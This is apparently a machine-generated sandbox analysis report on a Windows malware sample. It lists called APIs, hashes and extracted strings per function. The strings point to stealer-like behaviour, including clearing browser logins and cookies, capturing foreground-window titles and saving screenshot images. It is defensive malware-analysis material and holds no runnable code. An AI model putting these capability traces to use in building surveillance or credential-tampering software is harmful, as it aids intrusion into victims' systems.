                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                          APIs
                                          Strings
                                          • Cleared browsers logins and cookies., xrefs: 0040C130
                                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                          • API String ID: 3472027048-1236744412
                                          • Opcode ID: 0eb67f22db26bfbf69fd8d2aa32761b673633ffd036242d8c1b92dd0b17869b7
                                          • Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
                                          • Opcode Fuzzy Hash: 0eb67f22db26bfbf69fd8d2aa32761b673633ffd036242d8c1b92dd0b17869b7
                                          • Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
                                          APIs
                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$ForegroundLength
                                          • String ID: [ $ ]
                                          • API String ID: 3309952895-93608704
                                          • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                          • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SystemTimes$Sleep__aulldiv
                                          • String ID:
                                          • API String ID: 188215759-0
                                          • Opcode ID: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                          • Instruction ID: 34fec0fc5de9b46989c99fc374850f6e4511d06c61be9fc580282ef5e3b3a0c9
                                          • Opcode Fuzzy Hash: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                          • Instruction Fuzzy Hash: 4A1142B35043446BC304FBB5CD85DEF77ACEBC4359F040A3EF64A82061EE29EA498695
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 3919263394-0
                                          • Opcode ID: ea631e93aeae4d86132659a3c821e70bd950fb822780c369254ddbb306c6d1ec
                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                          • Opcode Fuzzy Hash: ea631e93aeae4d86132659a3c821e70bd950fb822780c369254ddbb306c6d1ec
                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                          APIs
                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                          • String ID:
                                          • API String ID: 2633735394-0
                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                          APIs
                                          • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                          • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                          • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                          • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MetricsSystem
                                          • String ID:
                                          • API String ID: 4116985748-0
                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                          APIs
                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                          • String ID:
                                          • API String ID: 1761009282-0
                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                          APIs
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                          • String ID: image/jpeg
                                          • API String ID: 1291196975-3785015651
                                          • Opcode ID: f7762c1077cd22b9d0966c79a8c7972fb49086d0d121f5f9ad0777a9e048a50c
                                          • Instruction ID: b1b0a2c635f45e8130f4767810c6fbb161559e0826da6e7acb487c9aae22ef17
                                          • Opcode Fuzzy Hash: f7762c1077cd22b9d0966c79a8c7972fb49086d0d121f5f9ad0777a9e048a50c
                                          • Instruction Fuzzy Hash: 6D316F72504310AFC701EF65C884D6FB7E9EF8A304F00496EF98597251DB7999048B66
                                          APIs
                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ACP$OCP
                                          • API String ID: 0-711371036
                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                          APIs
                                          • _wcslen.LIBCMT ref: 00416330
                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen$CloseCreateValue
                                          • String ID: !D@$okmode
                                          • API String ID: 3411444782-1942679189
                                          • Opcode ID: ffd0034025ce8a6f256035d87f0428f79cac076b847b20a61f7d23f5852e07e7
                                          • Instruction ID: 3691d04bdc76b081f03c0e50e7d604d291fd2bc6213442c77ae478975c73e837
                                          • Opcode Fuzzy Hash: ffd0034025ce8a6f256035d87f0428f79cac076b847b20a61f7d23f5852e07e7
                                          • Instruction Fuzzy Hash: E211A871B042011BDA187B72D822BBD2296DB84349F80483FF50AAF2E2DFBD4C51535D
                                          APIs
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
